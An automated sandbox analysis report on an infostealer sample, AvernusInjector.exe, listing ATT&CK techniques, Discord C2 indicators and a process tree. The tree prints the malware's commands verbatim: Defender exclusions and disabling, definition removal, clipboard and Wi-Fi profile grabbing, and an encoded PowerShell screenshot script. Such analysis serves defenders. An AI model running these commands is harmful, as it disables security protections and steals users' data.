4b60b2960da8862d8ddb07ca1a96302bc591110dc1898a0bc6495e4fbacd56ad

Analysis

max time kernel
148s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-11-2024 19:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Avernus/Avernus/DLLJector/DLL/AvernusInjector.exe
Size

7.6MB
MD5

a51fa12917ee0b019099602cf9dff962
SHA1

1632a80a702eae55aa6b48aa28023ece28a7a89b
SHA256

5342ca75a92236a45edf7c1128bddd93615cc9939086b5c9b6742818b1ca4d71
SHA512

df3885cf205924f3ebc174b8f202427331980ae6fc33a7f2aa7cf73eeb79db13c879d95859d9bc9b40034c1187ac5ce1c4b0e82a0a74ab1f7a23c24fe51907c3
SSDEEP

196608:YggHYgwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jE:hnIHziK1piXLGVE4Ue0VJY

Score

8^/10

collection defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1064	powershell.exe
1968	powershell.exe
716	powershell.exe
3636	powershell.exe
1576	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3200	powershell.exe
2860	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2768	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe
4816	AvernusInjector.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3180	tasklist.exe
3864	tasklist.exe
1492	tasklist.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral8/files/0x0008000000023c2c-21.dat	upx
behavioral8/memory/4816-25-0x00007FF8E4620000-0x00007FF8E4C83000-memory.dmp	upx
behavioral8/files/0x0008000000023c05-27.dat	upx
behavioral8/files/0x0008000000023c2a-29.dat	upx
behavioral8/memory/4816-48-0x00007FF8FB520000-0x00007FF8FB52F000-memory.dmp	upx
behavioral8/files/0x0008000000023c10-47.dat	upx
behavioral8/files/0x0008000000023c0f-46.dat	upx
behavioral8/files/0x0008000000023c0a-45.dat	upx
behavioral8/files/0x0008000000023c09-44.dat	upx
behavioral8/files/0x0008000000023c08-43.dat	upx
behavioral8/files/0x0008000000023c07-42.dat	upx
behavioral8/files/0x0008000000023c06-41.dat	upx
behavioral8/files/0x0008000000023bd6-40.dat	upx
behavioral8/files/0x0008000000023c4a-39.dat	upx
behavioral8/files/0x0016000000023c44-38.dat	upx
behavioral8/files/0x000b000000023c43-37.dat	upx
behavioral8/files/0x0008000000023c2b-34.dat	upx
behavioral8/files/0x0008000000023c29-33.dat	upx
behavioral8/memory/4816-31-0x00007FF8F8900000-0x00007FF8F8927000-memory.dmp	upx
behavioral8/memory/4816-54-0x00007FF8F5B20000-0x00007FF8F5B4B000-memory.dmp	upx
behavioral8/memory/4816-56-0x00007FF8F88D0000-0x00007FF8F88E9000-memory.dmp	upx
behavioral8/memory/4816-58-0x00007FF8F4AA0000-0x00007FF8F4AC5000-memory.dmp	upx
behavioral8/memory/4816-60-0x00007FF8E4300000-0x00007FF8E447F000-memory.dmp	upx
behavioral8/memory/4816-62-0x00007FF8F3EE0000-0x00007FF8F3EF9000-memory.dmp	upx
behavioral8/memory/4816-64-0x00007FF8F4690000-0x00007FF8F469D000-memory.dmp	upx
behavioral8/memory/4816-67-0x00007FF8F3C20000-0x00007FF8F3C54000-memory.dmp	upx
behavioral8/memory/4816-66-0x00007FF8E4620000-0x00007FF8E4C83000-memory.dmp	upx
behavioral8/memory/4816-70-0x00007FF8F38B0000-0x00007FF8F397E000-memory.dmp	upx
behavioral8/memory/4816-71-0x00007FF8E3B70000-0x00007FF8E40A3000-memory.dmp	upx
behavioral8/memory/4816-73-0x00007FF8F3B50000-0x00007FF8F3B64000-memory.dmp	upx
behavioral8/memory/4816-75-0x00007FF8F3FF0000-0x00007FF8F3FFD000-memory.dmp	upx
behavioral8/memory/4816-80-0x00007FF8F30A0000-0x00007FF8F3153000-memory.dmp	upx
behavioral8/memory/4816-81-0x00007FF8F4AA0000-0x00007FF8F4AC5000-memory.dmp	upx
behavioral8/memory/4816-152-0x00007FF8E4300000-0x00007FF8E447F000-memory.dmp	upx
behavioral8/memory/4816-234-0x00007FF8F3C20000-0x00007FF8F3C54000-memory.dmp	upx
behavioral8/memory/4816-280-0x00007FF8F38B0000-0x00007FF8F397E000-memory.dmp	upx
behavioral8/memory/4816-281-0x00007FF8E3B70000-0x00007FF8E40A3000-memory.dmp	upx
behavioral8/memory/4816-300-0x00007FF8E4620000-0x00007FF8E4C83000-memory.dmp	upx
behavioral8/memory/4816-306-0x00007FF8E4300000-0x00007FF8E447F000-memory.dmp	upx
behavioral8/memory/4816-335-0x00007FF8E4620000-0x00007FF8E4C83000-memory.dmp	upx
behavioral8/memory/4816-381-0x00007FF8F8900000-0x00007FF8F8927000-memory.dmp	upx
behavioral8/memory/4816-383-0x00007FF8F5B20000-0x00007FF8F5B4B000-memory.dmp	upx
behavioral8/memory/4816-395-0x00007FF8FB520000-0x00007FF8FB52F000-memory.dmp	upx
behavioral8/memory/4816-380-0x00007FF8E4620000-0x00007FF8E4C83000-memory.dmp	upx
behavioral8/memory/4816-400-0x00007FF8F4690000-0x00007FF8F469D000-memory.dmp	upx
behavioral8/memory/4816-401-0x00007FF8F3C20000-0x00007FF8F3C54000-memory.dmp	upx
behavioral8/memory/4816-402-0x00007FF8F38B0000-0x00007FF8F397E000-memory.dmp	upx
behavioral8/memory/4816-406-0x00007FF8F30A0000-0x00007FF8F3153000-memory.dmp	upx
behavioral8/memory/4816-405-0x00007FF8F3FF0000-0x00007FF8F3FFD000-memory.dmp	upx
behavioral8/memory/4816-404-0x00007FF8F3B50000-0x00007FF8F3B64000-memory.dmp	upx
behavioral8/memory/4816-403-0x00007FF8E3B70000-0x00007FF8E40A3000-memory.dmp	upx
behavioral8/memory/4816-399-0x00007FF8F3EE0000-0x00007FF8F3EF9000-memory.dmp	upx
behavioral8/memory/4816-398-0x00007FF8E4300000-0x00007FF8E447F000-memory.dmp	upx
behavioral8/memory/4816-397-0x00007FF8F4AA0000-0x00007FF8F4AC5000-memory.dmp	upx
behavioral8/memory/4816-396-0x00007FF8F88D0000-0x00007FF8F88E9000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3416	cmd.exe
4768	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4304	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4684	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1064	powershell.exe
1064	powershell.exe
1064	powershell.exe
3636	powershell.exe
3636	powershell.exe
1576	powershell.exe
1576	powershell.exe
3200	powershell.exe
3200	powershell.exe
3636	powershell.exe
3636	powershell.exe
4112	powershell.exe
4112	powershell.exe
1576	powershell.exe
3200	powershell.exe
4112	powershell.exe
1968	powershell.exe
1968	powershell.exe
3224	powershell.exe
3224	powershell.exe
716	powershell.exe
716	powershell.exe
1372	powershell.exe
1372	powershell.exe
1372	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeDebugPrivilege	3180	tasklist.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	3864	tasklist.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeIncreaseQuotaPrivilege	5000	WMIC.exe
Token: SeSecurityPrivilege	5000	WMIC.exe
Token: SeTakeOwnershipPrivilege	5000	WMIC.exe
Token: SeLoadDriverPrivilege	5000	WMIC.exe
Token: SeSystemProfilePrivilege	5000	WMIC.exe
Token: SeSystemtimePrivilege	5000	WMIC.exe
Token: SeProfSingleProcessPrivilege	5000	WMIC.exe
Token: SeIncBasePriorityPrivilege	5000	WMIC.exe
Token: SeCreatePagefilePrivilege	5000	WMIC.exe
Token: SeBackupPrivilege	5000	WMIC.exe
Token: SeRestorePrivilege	5000	WMIC.exe
Token: SeShutdownPrivilege	5000	WMIC.exe
Token: SeDebugPrivilege	5000	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5000	WMIC.exe
Token: SeRemoteShutdownPrivilege	5000	WMIC.exe
Token: SeUndockPrivilege	5000	WMIC.exe
Token: SeManageVolumePrivilege	5000	WMIC.exe
Token: 33	5000	WMIC.exe
Token: 34	5000	WMIC.exe
Token: 35	5000	WMIC.exe
Token: 36	5000	WMIC.exe
Token: SeDebugPrivilege	1492	tasklist.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeIncreaseQuotaPrivilege	5000	WMIC.exe
Token: SeSecurityPrivilege	5000	WMIC.exe
Token: SeTakeOwnershipPrivilege	5000	WMIC.exe
Token: SeLoadDriverPrivilege	5000	WMIC.exe
Token: SeSystemProfilePrivilege	5000	WMIC.exe
Token: SeSystemtimePrivilege	5000	WMIC.exe
Token: SeProfSingleProcessPrivilege	5000	WMIC.exe
Token: SeIncBasePriorityPrivilege	5000	WMIC.exe
Token: SeCreatePagefilePrivilege	5000	WMIC.exe
Token: SeBackupPrivilege	5000	WMIC.exe
Token: SeRestorePrivilege	5000	WMIC.exe
Token: SeShutdownPrivilege	5000	WMIC.exe
Token: SeDebugPrivilege	5000	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5000	WMIC.exe
Token: SeRemoteShutdownPrivilege	5000	WMIC.exe
Token: SeUndockPrivilege	5000	WMIC.exe
Token: SeManageVolumePrivilege	5000	WMIC.exe
Token: 33	5000	WMIC.exe
Token: 34	5000	WMIC.exe
Token: 35	5000	WMIC.exe
Token: 36	5000	WMIC.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeIncreaseQuotaPrivilege	4680	WMIC.exe
Token: SeSecurityPrivilege	4680	WMIC.exe
Token: SeTakeOwnershipPrivilege	4680	WMIC.exe
Token: SeLoadDriverPrivilege	4680	WMIC.exe
Token: SeSystemProfilePrivilege	4680	WMIC.exe
Token: SeSystemtimePrivilege	4680	WMIC.exe
Token: SeProfSingleProcessPrivilege	4680	WMIC.exe
Token: SeIncBasePriorityPrivilege	4680	WMIC.exe
Token: SeCreatePagefilePrivilege	4680	WMIC.exe
Token: SeBackupPrivilege	4680	WMIC.exe
Token: SeRestorePrivilege	4680	WMIC.exe
Token: SeShutdownPrivilege	4680	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4260 wrote to memory of 4816	4260	AvernusInjector.exe	84
PID 4260 wrote to memory of 4816	4260	AvernusInjector.exe	84
PID 4816 wrote to memory of 2820	4816	AvernusInjector.exe	89
PID 4816 wrote to memory of 2820	4816	AvernusInjector.exe	89
PID 4816 wrote to memory of 3832	4816	AvernusInjector.exe	90
PID 4816 wrote to memory of 3832	4816	AvernusInjector.exe	90
PID 4816 wrote to memory of 2132	4816	AvernusInjector.exe	92
PID 4816 wrote to memory of 2132	4816	AvernusInjector.exe	92
PID 4816 wrote to memory of 4632	4816	AvernusInjector.exe	95
PID 4816 wrote to memory of 4632	4816	AvernusInjector.exe	95
PID 4816 wrote to memory of 1800	4816	AvernusInjector.exe	96
PID 4816 wrote to memory of 1800	4816	AvernusInjector.exe	96
PID 2820 wrote to memory of 3636	2820	cmd.exe	99
PID 2820 wrote to memory of 3636	2820	cmd.exe	99
PID 3832 wrote to memory of 1064	3832	cmd.exe	100
PID 3832 wrote to memory of 1064	3832	cmd.exe	100
PID 1800 wrote to memory of 3180	1800	cmd.exe	101
PID 1800 wrote to memory of 3180	1800	cmd.exe	101
PID 4816 wrote to memory of 5024	4816	AvernusInjector.exe	102
PID 4816 wrote to memory of 5024	4816	AvernusInjector.exe	102
PID 4816 wrote to memory of 2860	4816	AvernusInjector.exe	103
PID 4816 wrote to memory of 2860	4816	AvernusInjector.exe	103
PID 4816 wrote to memory of 1252	4816	AvernusInjector.exe	105
PID 4816 wrote to memory of 1252	4816	AvernusInjector.exe	105
PID 4632 wrote to memory of 3864	4632	cmd.exe	108
PID 4632 wrote to memory of 3864	4632	cmd.exe	108
PID 2132 wrote to memory of 1576	2132	cmd.exe	109
PID 2132 wrote to memory of 1576	2132	cmd.exe	109
PID 4816 wrote to memory of 4620	4816	AvernusInjector.exe	110
PID 4816 wrote to memory of 4620	4816	AvernusInjector.exe	110
PID 4816 wrote to memory of 3416	4816	AvernusInjector.exe	111
PID 4816 wrote to memory of 3416	4816	AvernusInjector.exe	111
PID 4816 wrote to memory of 1624	4816	AvernusInjector.exe	113
PID 4816 wrote to memory of 1624	4816	AvernusInjector.exe	113
PID 4816 wrote to memory of 4540	4816	AvernusInjector.exe	116
PID 4816 wrote to memory of 4540	4816	AvernusInjector.exe	116
PID 5024 wrote to memory of 5000	5024	cmd.exe	154
PID 5024 wrote to memory of 5000	5024	cmd.exe	154
PID 1252 wrote to memory of 1492	1252	cmd.exe	120
PID 1252 wrote to memory of 1492	1252	cmd.exe	120
PID 2860 wrote to memory of 3200	2860	cmd.exe	121
PID 2860 wrote to memory of 3200	2860	cmd.exe	121
PID 1624 wrote to memory of 4684	1624	cmd.exe	122
PID 1624 wrote to memory of 4684	1624	cmd.exe	122
PID 3416 wrote to memory of 4768	3416	cmd.exe	123
PID 3416 wrote to memory of 4768	3416	cmd.exe	123
PID 4540 wrote to memory of 4112	4540	cmd.exe	124
PID 4540 wrote to memory of 4112	4540	cmd.exe	124
PID 4620 wrote to memory of 1796	4620	cmd.exe	125
PID 4620 wrote to memory of 1796	4620	cmd.exe	125
PID 4816 wrote to memory of 3596	4816	AvernusInjector.exe	126
PID 4816 wrote to memory of 3596	4816	AvernusInjector.exe	126
PID 3596 wrote to memory of 1316	3596	cmd.exe	128
PID 3596 wrote to memory of 1316	3596	cmd.exe	128
PID 4816 wrote to memory of 2072	4816	AvernusInjector.exe	129
PID 4816 wrote to memory of 2072	4816	AvernusInjector.exe	129
PID 2072 wrote to memory of 1484	2072	cmd.exe	131
PID 2072 wrote to memory of 1484	2072	cmd.exe	131
PID 4816 wrote to memory of 4332	4816	AvernusInjector.exe	132
PID 4816 wrote to memory of 4332	4816	AvernusInjector.exe	132
PID 4332 wrote to memory of 4812	4332	cmd.exe	135
PID 4332 wrote to memory of 4812	4332	cmd.exe	135
PID 4112 wrote to memory of 4844	4112	powershell.exe	134
PID 4112 wrote to memory of 4844	4112	powershell.exe	134

C:\Users\Admin\AppData\Local\Temp\Avernus\Avernus\DLLJector\DLL\AvernusInjector.exe
"C:\Users\Admin\AppData\Local\Temp\Avernus\Avernus\DLLJector\DLL\AvernusInjector.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4260
- C:\Users\Admin\AppData\Local\Temp\Avernus\Avernus\DLLJector\DLL\AvernusInjector.exe
  "C:\Users\Admin\AppData\Local\Temp\Avernus\Avernus\DLLJector\DLL\AvernusInjector.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Avernus\Avernus\DLLJector\DLL\AvernusInjector.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Avernus\Avernus\DLLJector\DLL\AvernusInjector.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5024
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4620
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3416
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1624
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
